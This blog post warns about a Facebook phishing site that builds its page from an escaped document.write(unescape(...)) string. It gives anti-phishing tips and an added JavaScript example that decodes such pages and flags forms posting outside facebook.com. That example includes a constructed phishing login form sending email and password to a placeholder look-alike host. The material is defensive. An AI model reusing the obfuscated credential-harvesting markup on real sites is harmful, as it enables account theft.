Pi’s Blog

My blog about Thunderbird and GSoC 2008

Facebook phishing warning

On Facebook I’ve started to see and receive a ton of new spam from friends whose accounts have been hijacked.  I went on one of the phishing sites and was amazed at how similar it looks to Facebook.  Because NoScript (thank you NoScript – link below) blocked the page’s scripts, I saw nothing at first, and that led me straight to the source: the contents are written entirely through JavaScript, via document.write(unescape(…..)).  fanebook, a phishing site, writes the entire page’s contents this way.  The string is escaped, so unless you can unescape all of that in your head, you have to run it through JavaScript’s unescape to see what it really writes:

Click here to see a text file with the HTML commented out

Then I wondered: whois fanebook.com?

Click here to see the results


The similarities in appearance between the phishing site login and facebook’s are remarkable, but it looks like fanebook is a little behind, as the page appears to be from February 07, 2008.


Notice the incorrect URL, copyright date, footer and the presence of the Tour link; the source is also a dead giveaway.  It links to the real facebook.com in several places.


How to avoid falling for a Facebook phishing scam

  • Don’t go to links posted by people on your wall, especially if you go to their profile and they have sent the same message to several other people.
  • http://www.facebook.com.xxxxxxxxx.xxxxxxxxxxx.cn is not a facebook site
  • Use some kind of phishing filter or related extension like WOT for Firefox.  NoScript can help as well.
  • If you already logged into Facebook and see a prompt to login again, don’t.
  • If you think that your account was hijacked, make a new password immediately.  Sometimes the phishing sites redirect you to Facebook itself so you think you logged in successfully.
  • Always check the URL before entering your credentials
  • You can use a password manager (but not Internet Explorer’s) that will enter your password automatically.  If you see a site that looks like facebook but Firefox doesn’t fill in your password, then it is fake.
  • If you suspect it is a fake, don’t sign in, or at least look at the source code first.  If it looks completely unintelligible then it is fake.
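The decoding step described at the top of the post and the look-alike host rule from the list above, as an added example that is not from the original post: it pulls out the escaped string a page hands to document.write(unescape(...)), decodes it with the legacy %XX and %uXXXX rules (slightly more general than the single case in the post), and reports which hosts the revealed markup actually points at. The sample page source and the host example-phish.cn are constructed placeholders, and every function name here is mine.

```javascript
// Added example, not from the original post: recover what a page's
// document.write(unescape("...")) call really writes, then check which hosts
// the decoded markup points at. Plain Node, no dependencies.
const WRITE_RE = /document\.write\s*\(\s*unescape\s*\(\s*(['"])([\s\S]*?)\1\s*\)\s*\)/g;

// Legacy unescape() decodes %XX and %uXXXX (decodeURIComponent rejects %u),
// so the legacy rules are implemented directly here.
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u, b) =>
    String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// Concatenates the markup emitted by every document.write(unescape()) call.
function decodeWrittenHtml(source) {
  return [...source.matchAll(WRITE_RE)].map((m) => legacyUnescape(m[2])).join('');
}

// True only for facebook.com or a subdomain of it. A host such as
// www.facebook.com.example.cn fails: its registrable domain is example.cn.
function isFacebookHost(host) {
  host = host.toLowerCase();
  return host === 'facebook.com' || host.endsWith('.facebook.com');
}

// Collects every absolute href/action/src target, split by whether the host
// really belongs to facebook.com. Relative URLs are skipped.
function classifyTargets(html) {
  const out = { facebook: [], other: [] };
  for (const m of html.matchAll(/\b(?:href|action|src)\s*=\s*["']([^"']+)["']/gi)) {
    let host;
    try { host = new URL(m[1]).hostname; } catch { continue; }
    (isFacebookHost(host) ? out.facebook : out.other).push(host);
  }
  return out;
}

// Constructed sample in the style the post describes: the visible login page
// is one escaped string written at load time; example-phish.cn is a placeholder.
const SAMPLE_SOURCE =
  '<html><body><script>document.write(unescape("' +
  '%3Cform%20action%3D%22http%3A//www.facebook.com.example-phish.cn/login.php%22%3E' +
  '%3Cinput%20name%3D%22email%22%3E%3Cinput%20name%3D%22pass%22%3E%3C/form%3E' +
  '%3Ca%20href%3D%22http%3A//www.facebook.com/tour%22%3ETour%3C/a%3E' +
  '"))</script></body></html>';

function analyze(source) {
  const html = decodeWrittenHtml(source);
  return { html, targets: classifyTargets(html) };
}
console.log(JSON.stringify(analyze(SAMPLE_SOURCE), null, 2));
```

Running it against a saved copy of a suspect page shows the markup the browser would have rendered and makes a form that posts to a host outside facebook.com stand out immediately, which is the "look at the source" check the list recommends.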

August 16, 2008 - Posted by | Uncategorized | , ,

1 Comment »

  1. […] (Here are a few other examples of warnings at Weblog.com.np, hem.com and Pi’s blog. […]

    Pingback by Matt Bigelow » Blog Archive » Watch out for the ‘Fanebook’ Facebook forgery | August 18, 2008 | Reply
